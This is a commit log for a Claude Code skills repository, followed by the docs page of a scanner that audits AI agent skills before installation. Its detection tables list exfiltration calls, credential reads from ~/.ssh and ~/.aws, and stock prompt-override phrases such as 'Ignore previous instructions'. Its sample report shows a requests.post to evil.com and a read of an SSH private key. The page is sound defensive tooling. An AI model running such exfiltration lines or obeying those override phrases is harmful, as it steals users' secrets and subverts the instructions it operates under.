* fix: add missing plugin.json files and restore trailing newlines - Add plugin.json for review-fix-a11y skill - Add plugin.json for free-llm-api skill - Restore POSIX-compliant trailing newlines in JSON index files * feat(engineering): add review-fix-a11y skill (WCAG 2.2 a11y audit + fix) (#375) Adds review-fix-a11y (WCAG 2.2 a11y audit + fix) and free-llm-api skills. Includes: - review-fix-a11y: WCAG 2.2 audit workflow, a11y_audit.py scanner, contrast_checker.py - free-llm-api: ChatAnywhere, Groq, Cerebras, OpenRouter, llm-mux, One API setup - secret_scanner.py upgrade with secrets-patterns-db integration (1,600+ patterns) Co-authored-by: ivanopenclaw223-alt <ivanopenclaw223-alt@users.noreply.github.com> * chore: sync codex skills symlinks [automated] * Revert "feat(engineering): add review-fix-a11y skill (WCAG 2.2 a11y audit + fix) (#375)" This reverts commit49c9f2109f. * chore: sync codex skills symlinks [automated] * Revert "feat(engineering): add review-fix-a11y skill (WCAG 2.2 a11y audit + fix) (#375)" This reverts commit49c9f2109f. * feat(engineering-team): add a11y-audit skill — WCAG 2.2 accessibility audit & fix (#376) Built from scratch (replaces reverted PR #375 contribution). Skill package: - SKILL.md: 1132 lines, 3-phase workflow (scan → fix → verify), per-framework fix patterns (React, Next.js, Vue, Angular, Svelte, HTML), CI/CD integration guide, 20+ issue type coverage - scripts/a11y_scanner.py: static scanner detecting 20+ violation types across HTML/JSX/TSX/Vue/Svelte/CSS — severity-ranked, CI-friendly exit codes - scripts/contrast_checker.py: WCAG contrast calculator with AA/AAA checks, --suggest mode, --batch CSS scanning, named color support - references/wcag-quick-ref.md: WCAG 2.2 Level A/AA criteria table - references/aria-patterns.md: ARIA roles, live regions, keyboard interaction - references/framework-a11y-patterns.md: React, Vue, Angular, Svelte fix patterns - assets/sample-component.tsx: sample file with intentional violations - expected_outputs/: scan report, contrast output, JSON output samples - /a11y-audit slash command, settings.json, plugin.json, README.md Validation: 97.6/100 (EXCELLENT), quality 73.9/100 (B-), scripts 2/2 PASS Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * chore: sync codex skills symlinks [automated] * docs: sync counts across all docs — 205 skills, 268 tools, 19 commands, 22 plugins Update CLAUDE.md, README.md, docs/index.md, docs/getting-started.md, mkdocs.yml, marketplace.json with consistent counts. Sync Gemini CLI index with new skills (code-to-prd, plugin-audit). Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(marketplace): add 6 missing standalone plugins — total 22→28 Added to marketplace: - a11y-audit (WCAG 2.2 accessibility audit) - executive-mentor (adversarial thinking partner) - docker-development (Dockerfile, compose, multi-stage) - helm-chart-builder (Helm chart scaffolding) - terraform-patterns (IaC module design) - research-summarizer (structured research synthesis) Also fixed version 1.0.0 → 2.1.2 on 4 plugin.json files (executive-mentor, docker-development, helm-chart-builder, research-summarizer) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(commands): add /seo-auditor — 7-phase SEO audit pipeline for documentation - 7 phases: discovery → meta tags → content quality → keywords → links → sitemap → report - Integrates 8 marketing-skill scripts: seo_checker, content_scorer, humanizer_scorer, headline_scorer, seo_optimizer, sitemap_analyzer, schema_validator, topic_cluster_mapper - References 6 SEO knowledge bases for audit framework, AI search, content optimization, URL design, internal linking, AI detection - Auto-fixes: generic titles, missing descriptions, broken links, orphan pages - Preserves high-ranking pages — only fixes critical issues on those - Registered in both commands/ (distributable) and .claude/commands/ (local) Also: sync all doc counts — 28 plugins, 26 eng-core skills, 21 commands Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(seo): fix multi-line YAML description parser, add 2 orphan pages to nav - generate-docs.py: extract_description_from_frontmatter() now handles multi-line YAML block scalars (|, >, indented continuation) — fixes 14 pages that had 56-65 char truncated descriptions - mkdocs.yml: add epic-design and research-summarizer to nav (orphan pages) - Regenerated 251 pages, rebuilt sitemap (278 URLs) - SEO audit: 0 broken links, 17→3 short descriptions, 278/278 pages have "Claude Code Skills" in <title> Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Leo <leo@openclaw.ai> Co-authored-by: ivanopenclaw223-alt <ivanopenclaw223@gmail.com> Co-authored-by: ivanopenclaw223-alt <ivanopenclaw223-alt@users.noreply.github.com> Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
174 lines
7.7 KiB
Markdown
174 lines
7.7 KiB
Markdown
---
|
|
title: "Skill Security Auditor — Agent Skill for Codex & OpenClaw"
|
|
description: "Security audit and vulnerability scanner for AI agent skills before installation. Use when: (1) evaluating a skill from an untrusted source, (2)."
|
|
---
|
|
|
|
# Skill Security Auditor
|
|
|
|
<div class="page-meta" markdown>
|
|
<span class="meta-badge">:material-rocket-launch: Engineering - POWERFUL</span>
|
|
<span class="meta-badge">:material-identifier: `skill-security-auditor`</span>
|
|
<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/engineering/skill-security-auditor/SKILL.md">Source</a></span>
|
|
</div>
|
|
|
|
<div class="install-banner" markdown>
|
|
<span class="install-label">Install:</span> <code>claude /plugin install engineering-advanced-skills</code>
|
|
</div>
|
|
|
|
|
|
Scan and audit AI agent skills for security risks before installation. Produces a
|
|
clear **PASS / WARN / FAIL** verdict with findings and remediation guidance.
|
|
|
|
## Quick Start
|
|
|
|
```bash
|
|
# Audit a local skill directory
|
|
python3 scripts/skill_security_auditor.py /path/to/skill-name/
|
|
|
|
# Audit a skill from a git repo
|
|
python3 scripts/skill_security_auditor.py https://github.com/user/repo --skill skill-name
|
|
|
|
# Audit with strict mode (any WARN becomes FAIL)
|
|
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --strict
|
|
|
|
# Output JSON report
|
|
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --json
|
|
```
|
|
|
|
## What Gets Scanned
|
|
|
|
### 1. Code Execution Risks (Python/Bash Scripts)
|
|
|
|
Scans all `.py`, `.sh`, `.bash`, `.js`, `.ts` files for:
|
|
|
|
| Category | Patterns Detected | Severity |
|
|
|----------|-------------------|----------|
|
|
| **Command injection** | `os.system()`, `os.popen()`, `subprocess.call(shell=True)`, backtick execution | 🔴 CRITICAL |
|
|
| **Code execution** | `eval()`, `exec()`, `compile()`, `__import__()` | 🔴 CRITICAL |
|
|
| **Obfuscation** | base64-encoded payloads, `codecs.decode`, hex-encoded strings, `chr()` chains | 🔴 CRITICAL |
|
|
| **Network exfiltration** | `requests.post()`, `urllib.request`, `socket.connect()`, `httpx`, `aiohttp` | 🔴 CRITICAL |
|
|
| **Credential harvesting** | reads from `~/.ssh`, `~/.aws`, `~/.config`, env var extraction patterns | 🔴 CRITICAL |
|
|
| **File system abuse** | writes outside skill dir, `/etc/`, `~/.bashrc`, `~/.profile`, symlink creation | 🟡 HIGH |
|
|
| **Privilege escalation** | `sudo`, `chmod 777`, `setuid`, cron manipulation | 🔴 CRITICAL |
|
|
| **Unsafe deserialization** | `pickle.loads()`, `yaml.load()` (without SafeLoader), `marshal.loads()` | 🟡 HIGH |
|
|
| **Subprocess (safe)** | `subprocess.run()` with list args, no shell | ⚪ INFO |
|
|
|
|
### 2. Prompt Injection in SKILL.md
|
|
|
|
Scans SKILL.md and all `.md` reference files for:
|
|
|
|
| Pattern | Example | Severity |
|
|
|---------|---------|----------|
|
|
| **System prompt override** | "Ignore previous instructions", "You are now..." | 🔴 CRITICAL |
|
|
| **Role hijacking** | "Act as root", "Pretend you have no restrictions" | 🔴 CRITICAL |
|
|
| **Safety bypass** | "Skip safety checks", "Disable content filtering" | 🔴 CRITICAL |
|
|
| **Hidden instructions** | Zero-width characters, HTML comments with directives | 🟡 HIGH |
|
|
| **Excessive permissions** | "Run any command", "Full filesystem access" | 🟡 HIGH |
|
|
| **Data extraction** | "Send contents of", "Upload file to", "POST to" | 🔴 CRITICAL |
|
|
|
|
### 3. Dependency Supply Chain
|
|
|
|
For skills with `requirements.txt`, `package.json`, or inline `pip install`:
|
|
|
|
| Check | What It Does | Severity |
|
|
|-------|-------------|----------|
|
|
| **Known vulnerabilities** | Cross-reference with PyPI/npm advisory databases | 🔴 CRITICAL |
|
|
| **Typosquatting** | Flag packages similar to popular ones (e.g., `reqeusts`) | 🟡 HIGH |
|
|
| **Unpinned versions** | Flag `requests>=2.0` vs `requests==2.31.0` | ⚪ INFO |
|
|
| **Install commands in code** | `pip install` or `npm install` inside scripts | 🟡 HIGH |
|
|
| **Suspicious packages** | Low download count, recent creation, single maintainer | ⚪ INFO |
|
|
|
|
### 4. File System & Structure
|
|
|
|
| Check | What It Does | Severity |
|
|
|-------|-------------|----------|
|
|
| **Boundary violation** | Scripts referencing paths outside skill directory | 🟡 HIGH |
|
|
| **Hidden files** | `.env`, dotfiles that shouldn't be in a skill | 🟡 HIGH |
|
|
| **Binary files** | Unexpected executables, `.so`, `.dll`, `.exe` | 🔴 CRITICAL |
|
|
| **Large files** | Files >1MB that could hide payloads | ⚪ INFO |
|
|
| **Symlinks** | Symbolic links pointing outside skill directory | 🔴 CRITICAL |
|
|
|
|
## Audit Workflow
|
|
|
|
1. **Run the scanner** on the skill directory or repo URL
|
|
2. **Review the report** — findings grouped by severity
|
|
3. **Verdict interpretation:**
|
|
- **✅ PASS** — No critical or high findings. Safe to install.
|
|
- **⚠️ WARN** — High/medium findings detected. Review manually before installing.
|
|
- **❌ FAIL** — Critical findings. Do NOT install without remediation.
|
|
4. **Remediation** — each finding includes specific fix guidance
|
|
|
|
## Reading the Report
|
|
|
|
```
|
|
╔══════════════════════════════════════════════╗
|
|
║ SKILL SECURITY AUDIT REPORT ║
|
|
║ Skill: example-skill ║
|
|
║ Verdict: ❌ FAIL ║
|
|
╠══════════════════════════════════════════════╣
|
|
║ 🔴 CRITICAL: 2 🟡 HIGH: 1 ⚪ INFO: 3 ║
|
|
╚══════════════════════════════════════════════╝
|
|
|
|
🔴 CRITICAL [CODE-EXEC] scripts/helper.py:42
|
|
Pattern: eval(user_input)
|
|
Risk: Arbitrary code execution from untrusted input
|
|
Fix: Replace eval() with ast.literal_eval() or explicit parsing
|
|
|
|
🔴 CRITICAL [NET-EXFIL] scripts/analyzer.py:88
|
|
Pattern: requests.post("https://evil.com/collect", data=results)
|
|
Risk: Data exfiltration to external server
|
|
Fix: Remove outbound network calls or verify destination is trusted
|
|
|
|
🟡 HIGH [FS-BOUNDARY] scripts/scanner.py:15
|
|
Pattern: open(os.path.expanduser("~/.ssh/id_rsa"))
|
|
Risk: Reads SSH private key outside skill scope
|
|
Fix: Remove filesystem access outside skill directory
|
|
|
|
⚪ INFO [DEPS-UNPIN] requirements.txt:3
|
|
Pattern: requests>=2.0
|
|
Risk: Unpinned dependency may introduce vulnerabilities
|
|
Fix: Pin to specific version: requests==2.31.0
|
|
```
|
|
|
|
## Advanced Usage
|
|
|
|
### Audit a Skill from Git Before Cloning
|
|
|
|
```bash
|
|
# Clone to temp dir, audit, then clean up
|
|
python3 scripts/skill_security_auditor.py https://github.com/user/skill-repo --skill my-skill --cleanup
|
|
```
|
|
|
|
### CI/CD Integration
|
|
|
|
```yaml
|
|
# GitHub Actions step
|
|
- name: "audit-skill-security"
|
|
run: |
|
|
python3 skill-security-auditor/scripts/skill_security_auditor.py ./skills/new-skill/ --strict --json > audit.json
|
|
if [ $? -ne 0 ]; then echo "Security audit failed"; exit 1; fi
|
|
```
|
|
|
|
### Batch Audit
|
|
|
|
```bash
|
|
# Audit all skills in a directory
|
|
for skill in skills/*/; do
|
|
python3 scripts/skill_security_auditor.py "$skill" --json >> audit-results.jsonl
|
|
done
|
|
```
|
|
|
|
## Threat Model Reference
|
|
|
|
For the complete threat model, detection patterns, and known attack vectors against AI agent skills, see [references/threat-model.md](https://github.com/alirezarezvani/claude-skills/tree/main/engineering/skill-security-auditor/references/threat-model.md).
|
|
|
|
## Limitations
|
|
|
|
- Cannot detect logic bombs or time-delayed payloads with certainty
|
|
- Obfuscation detection is pattern-based — a sufficiently creative attacker may bypass it
|
|
- Network destination reputation checks require internet access
|
|
- Does not execute code — static analysis only (safe but less complete than dynamic analysis)
|
|
- Dependency vulnerability checks use local pattern matching, not live CVE databases
|
|
|
|
When in doubt after an audit, **don't install**. Ask the skill author for clarification.
|